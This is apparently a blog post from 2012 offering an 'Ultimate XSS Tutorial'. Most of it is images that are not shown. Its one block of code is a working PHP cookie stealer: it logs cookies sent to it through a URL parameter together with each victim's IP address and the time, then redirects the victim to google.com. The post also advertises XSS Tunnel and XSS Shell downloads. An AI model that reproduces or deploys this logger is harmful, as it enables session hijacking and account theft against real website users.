Tuesday 25 December 2012

Ultimate XSS Tutorial [TuT]





[Image: yh38A.jpg]
[Image: GHDJw.jpg]
[Image: mptKn.jpg]
[Image: IWNKa.jpg]
Code:
<?php
$cookie = urldecode($_GET['c']);
$fp = fopen("CookieLog.txt", "a");
$cookie = $cookie . ": ".$_SERVER['REMOTE_ADDR']." at ".date("r",time())."\n";
fwrite($fp, "$cookie \n");
fclose($fp);
header("Location: http://google.com ");
?>

[Image: P87rZ.jpg]

XSS Tunnel and XSS Shell.
Download files:
[Image: img7.jpg]
Read More
CEX.io